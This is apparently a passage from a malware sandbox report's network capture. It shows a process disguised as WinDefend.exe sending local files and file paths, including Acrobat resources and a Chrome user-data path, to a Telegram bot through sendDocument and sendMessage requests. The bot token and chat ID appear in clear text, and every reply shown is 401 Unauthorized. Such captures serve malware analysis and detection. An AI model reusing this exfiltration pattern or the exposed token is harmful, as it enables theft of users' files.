0c af 8b 80 86 fc 00 6a 76 07 26 b8 43 48 ae f0 2a 2a 2a f2 02 7a 71 33 10 c3 1d 02 67 20 29 84 33 81 Data Ascii: PNGIHDRVWsRGBIDAT8c``SPPf0a#&N~I!;Xg#Dftu2\C]hml&ePn s4<062"?~j<4>jv&CH***zq3g )3
2024-05-23 13:34:22 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 66 36 36 39 31 39 30 2d 63 63 35 61 2d 34 31 32 62 2d 61 31 30 34 2d 63 38 33 64 34 65 30 30 34 61 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --af669190-cc5a-412b-a104-c83d4e004a47Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:22 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:22 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 61 66 36 36 39 31 39 30 2d 63 63 35 61 2d 34 31 32 62 2d 61 31 30 34 2d 63 38 33 64 34 65 30 30 34 61 34 37 2d 2d 0d 0a Data Ascii: --af669190-cc5a-412b-a104-c83d4e004a47--
2024-05-23 13:34:22 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:22 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	61062	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:22 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="110de683-f34e-4774-8a2c-41f5f8a24236" Host: api.telegram.org Content-Length: 516 Expect: 100-continue
2024-05-23 13:34:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:22 UTC	40	OUT	Data Raw: 2d 2d 31 31 30 64 65 36 38 33 2d 66 33 34 65 2d 34 37 37 34 2d 38 61 32 63 2d 34 31 66 35 66 38 61 32 34 32 33 36 0d 0a Data Ascii: --110de683-f34e-4774-8a2c-41f5f8a24236
2024-05-23 13:34:22 UTC	131	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=topbar_floating_button.png; filename*=utf-8''topbar_floating_button.png
2024-05-23 13:34:22 UTC	160	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 42 49 44 41 54 78 da ec ce 51 0d 00 30 08 c4 d0 0b 99 0e 32 09 08 9e 28 70 b4 a0 e2 7e 5a 03 7d 27 f3 3e 49 25 4f 1d c6 f9 56 21 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 02 da f8 9f 2f c0 00 c2 60 04 3c ab b2 60 8c 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<BIDATxQ02(p~Z}'>I%OV!s/`<`IENDB`
2024-05-23 13:34:22 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 31 30 64 65 36 38 33 2d 66 33 34 65 2d 34 37 37 34 2d 38 61 32 63 2d 34 31 66 35 66 38 61 32 34 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --110de683-f34e-4774-8a2c-41f5f8a24236Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:22 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:22 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 31 30 64 65 36 38 33 2d 66 33 34 65 2d 34 37 37 34 2d 38 61 32 63 2d 34 31 66 35 66 38 61 32 34 32 33 36 2d 2d 0d 0a Data Ascii: --110de683-f34e-4774-8a2c-41f5f8a24236--
2024-05-23 13:34:22 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:22 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	61063	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:22 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="f78550a6-a677-44a2-9e89-71f546a24bed" Host: api.telegram.org Content-Length: 16076 Expect: 100-continue
2024-05-23 13:34:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:22 UTC	40	OUT	Data Raw: 2d 2d 66 37 38 35 35 30 61 36 2d 61 36 37 37 2d 34 34 61 32 2d 39 65 38 39 2d 37 31 66 35 34 36 61 32 34 62 65 64 0d 0a Data Ascii: --f78550a6-a677-44a2-9e89-71f546a24bed
2024-05-23 13:34:22 UTC	105	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=template1.pdf; filename*=utf-8''template1.pdf
2024-05-23 13:34:22 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 30 20 30 20 6f 62 6a 20 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 31 35 37 34 36 2f 4f 20 31 36 2f 45 20 31 30 30 39 37 2f 4e 20 31 2f 54 20 31 35 34 39 39 2f 48 20 5b 20 37 33 36 20 32 30 34 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 31 30 20 32 32 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 34 30 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 30 37 30 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 39 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 32 33 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 33 30 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 Data Ascii: %PDF-1.6%10 0 obj <</Linearized 1/L 15746/O 16/E 10097/N 1/T 15499/H [ 736 204]>>endobj xref10 220000000016 00000 n0000000940 00000 n0000001070 00000 n0000001196 00000 n0000001234 00000 n0000001305 00000 n000000
2024-05-23 13:34:22 UTC	4096	OUT	Data Raw: 8f 37 77 ca ea 57 da ea cf da e9 af 3a ea 37 fa c3 47 ab 7f 61 8c 3c 63 f4 bf 05 e7 51 59 13 9d c3 04 7f 53 ae fc f5 21 f5 14 49 35 19 0a a4 83 4f c6 45 1c 3d d5 68 32 26 03 22 01 90 a9 62 35 d2 2a e0 48 98 4f 14 0c 25 3f c4 45 05 e4 dd 9c 7d 50 3e 1a 5b 87 08 0b c5 c7 66 29 b9 30 c5 ee 89 11 a1 ea b1 b7 c0 a4 ab 0d 95 ae 20 b8 8c 0d 95 ea 19 15 44 68 b3 76 d5 24 4b 53 ec e8 50 9c 0a ec b7 d8 98 ea d4 64 1b 8d e3 a3 c0 60 28 65 95 e1 b1 a4 66 61 77 78 4e a4 6f 95 13 2f b7 16 87 f7 c5 84 d0 c1 e2 d8 0b 34 16 34 00 2d 02 45 01 31 bb d4 56 30 5c d6 e5 29 2f ca 57 43 25 4c 05 10 0b 80 79 55 e0 94 41 0c 26 ed 8a 21 2a d3 5f 4b a2 94 18 32 0c 5a c0 43 c1 69 10 1d 43 66 89 46 22 65 66 66 4d 24 1b b7 89 24 49 c6 98 d4 91 89 ab 58 b2 c0 b3 3d 2f e3 f3 03 83 df 55 Data Ascii: 7wW:7Ga<cQYS!I5OE=h2&"b5HO%?E}P>[f)0 Dhv$KSPd`(efawxNo/44-E1V0\)/WC%LyUA&!_K2ZCiCfF"effM$$IX=/U
2024-05-23 13:34:22 UTC	4096	OUT	Data Raw: fb db 80 dc 05 dc 8a dd 10 dd 96 de 1c de a2 df 29 df af e0 36 e0 bd e1 44 e1 cc e2 53 e2 db e3 63 e3 eb e4 73 e4 fc e5 84 e6 0d e6 96 e7 1f e7 a9 e8 32 e8 bc e9 46 e9 d0 ea 5b ea e5 eb 70 eb fb ec 86 ed 11 ed 9c ee 28 ee b4 ef 40 ef cc f0 58 f0 e5 f1 72 f1 ff f2 8c f3 19 f3 a7 f4 34 f4 c2 f5 50 f5 de f6 6d f6 fb f7 8a f8 19 f8 a8 f9 38 f9 c7 fa 57 fa e7 fb 77 fc 07 fc 98 fd 29 fd ba fe 4b fe dc ff 6d ff ff 02 0c 00 f7 84 f3 fb 0a 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 32 37 20 30 20 6f 62 6a 3c 3c 2f 53 75 62 74 79 70 65 2f 54 79 70 65 31 43 2f 4c 65 6e 67 74 68 20 31 32 34 33 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 3e 3e 73 74 72 65 61 6d 0d 0a 48 89 5c 53 6d 4c 53 67 14 be b7 ed 7d 51 d4 8a 5c 5b 92 62 7a af 8a 02 e5 Data Ascii: )6DScs2F[p(@Xr4Pm8Ww)Kmendstreamendobj27 0 obj<</Subtype/Type1C/Length 1243/Filter/FlateDecode>>streamH\SmLSg}Q\[bz
2024-05-23 13:34:22 UTC	3458	OUT	Data Raw: 20 20 20 20 78 6d 6c 6e 73 3a 64 63 3d 22 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 65 6c 65 6d 65 6e 74 73 2f 31 2e 31 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 63 3a 66 6f 72 6d 61 74 3e 61 70 70 6c 69 63 61 74 69 6f 6e 2f 70 64 66 3c 2f 64 63 3a 66 6f 72 6d 61 74 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 63 3a 63 72 65 61 74 6f 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 72 64 66 3a 6c 69 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 63 3a 63 72 65 61 74 6f 72 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 63 3a 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 72 64 66 3a 41 6c 74 3e 0a 20 Data Ascii: xmlns:dc="http://purl.org/dc/elements/1.1/"> <dc:format>application/pdf</dc:format> <dc:creator> <rdf:Seq> <rdf:li/> </rdf:Seq> </dc:creator> <dc:title> <rdf:Alt>
2024-05-23 13:34:22 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 37 38 35 35 30 61 36 2d 61 36 37 37 2d 34 34 61 32 2d 39 65 38 39 2d 37 31 66 35 34 36 61 32 34 62 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --f78550a6-a677-44a2-9e89-71f546a24bedContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:22 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:22 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 37 38 35 35 30 61 36 2d 61 36 37 37 2d 34 34 61 32 2d 39 65 38 39 2d 37 31 66 35 34 36 61 32 34 62 65 64 2d 2d 0d 0a Data Ascii: --f78550a6-a677-44a2-9e89-71f546a24bed--
2024-05-23 13:34:22 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:22 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	61065	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:23 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 192 Expect: 100-continue
2024-05-23 13:34:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:23 UTC	192	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 36 31 37 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+AddressBook2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CAddressBook2x.png%0ASize%3A+617+B
2024-05-23 13:34:23 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:23 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	61066	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:23 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 386 Expect: 100-continue
2024-05-23 13:34:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:23 UTC	386	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 5f 63 6c 6f 73 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 Data Ascii: chat_id=1655240967&text=File%3A+topbar_floating_button_close.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Dat
2024-05-23 13:34:23 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:23 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	61067	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:23 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 160 Expect: 100-continue
2024-05-23 13:34:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:24 UTC	160	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 65 6d 70 6c 61 74 65 32 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 44 6f 63 54 65 6d 70 6c 61 74 65 73 25 35 43 45 4e 55 25 35 43 74 65 6d 70 6c 61 74 65 32 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 32 38 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+template2.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CDocTemplates%5CENU%5Ctemplate2.pdf%0ASize%3A+28+KB
2024-05-23 13:34:24 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:24 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	61068	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:24 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="aabc68b0-0b54-4330-9a22-9260ea5a3656" Host: api.telegram.org Content-Length: 955 Expect: 100-continue
2024-05-23 13:34:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:24 UTC	40	OUT	Data Raw: 2d 2d 61 61 62 63 36 38 62 30 2d 30 62 35 34 2d 34 33 33 30 2d 39 61 32 32 2d 39 32 36 30 65 61 35 61 33 36 35 36 0d 0a Data Ascii: --aabc68b0-0b54-4330-9a22-9260ea5a3656
2024-05-23 13:34:24 UTC	113	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=AddressBook2x.png; filename*=utf-8''AddressBook2x.png
2024-05-23 13:34:24 UTC	617	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 24 00 00 00 24 08 06 00 00 00 e1 00 98 98 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 02 23 49 44 41 54 58 09 ed 98 cf 4b 02 41 14 c7 dd 35 bd 84 28 05 45 50 87 bd 79 eb 18 44 58 d1 a5 fe 84 a0 73 5e 3a f8 8b ed 14 78 88 0e eb ca 7a ad 7f a0 63 e7 08 42 e8 1c d4 a1 a8 53 97 d2 28 0c bb 44 28 b8 7d 47 7c b1 ee da b8 b8 63 59 29 0c 6f e6 bd f1 bd 8f df 5d df ac fa 7c c3 17 5f 01 c9 1e 4e 26 93 15 d3 34 c7 c8 5f 28 14 9a 7b 12 89 84 49 3e 11 56 92 a4 32 ea 14 83 c1 a0 aa 69 da 3d e5 94 69 42 d6 0a 43 be 7e 58 d4 99 42 de f5 7a bd 7e a9 aa ea 34 d5 70 00 51 e0 bb 2c 13 a0 56 ab 69 54 ef c7 81 18 08 2e df d2 40 01 b5 2e 5f 93 69 20 14 22 75 98 fd 37 40 cf b8 2f 9e ac 9f dc ed 5c b4 42 55 bf df bf 8a de Data Ascii: PNGIHDR$$sRGB#IDATXKA5(EPyDXs^:xzcBS(D(}G\|cY)o]\|_N&4_({I>V2i=iBC~XBz~4pQ,ViT.@._i "u7@/\BU
2024-05-23 13:34:24 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 61 62 63 36 38 62 30 2d 30 62 35 34 2d 34 33 33 30 2d 39 61 32 32 2d 39 32 36 30 65 61 35 61 33 36 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --aabc68b0-0b54-4330-9a22-9260ea5a3656Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:24 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:24 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 61 61 62 63 36 38 62 30 2d 30 62 35 34 2d 34 33 33 30 2d 39 61 32 32 2d 39 32 36 30 65 61 35 61 33 36 35 36 2d 2d 0d 0a Data Ascii: --aabc68b0-0b54-4330-9a22-9260ea5a3656--
2024-05-23 13:34:24 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:24 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	61069	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:24 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="ce3eefb3-86bf-4968-a35e-c20038f39fae" Host: api.telegram.org Content-Length: 620 Expect: 100-continue
2024-05-23 13:34:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:24 UTC	40	OUT	Data Raw: 2d 2d 63 65 33 65 65 66 62 33 2d 38 36 62 66 2d 34 39 36 38 2d 61 33 35 65 2d 63 32 30 30 33 38 66 33 39 66 61 65 0d 0a Data Ascii: --ce3eefb3-86bf-4968-a35e-c20038f39fae
2024-05-23 13:34:24 UTC	143	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 5f 63 6c 6f 73 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 5f 63 6c 6f 73 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=topbar_floating_button_close.png; filename*=utf-8''topbar_floating_button_close.png
2024-05-23 13:34:24 UTC	252	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 9e 49 44 41 54 78 da ec d5 c1 0d 80 20 0c 05 50 70 05 58 04 e7 97 15 ec 48 08 b1 07 62 40 b0 06 b8 7c 92 5e 4c 43 5f a0 45 1d 42 50 2b 97 06 00 00 00 00 58 0d 50 09 d0 19 2e c6 11 c3 bc e4 18 ce 71 bd fb 7e 01 f8 70 2f aa 20 d2 b7 93 73 fc 08 80 e1 e2 25 44 5e 9c 1a a7 24 06 d4 10 e2 e2 12 40 09 21 2e 2e 05 3c 11 e2 e2 29 b6 3f 03 34 7b 0c 6b 0d 47 33 af a0 d6 84 34 a3 09 5b 63 48 a3 c7 30 7f 88 6c 03 38 e4 21 72 bc b1 6d 9c 52 ca d9 7b f7 c5 df 10 00 00 00 00 e0 12 60 00 66 b7 8c 08 23 bb 78 cd 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<IDATx PpXHb@\|^LC_EBP+XP.q~p/ s%D^$@!..<)?4{kG34[cH0l8!rmR{`f#xIENDB`
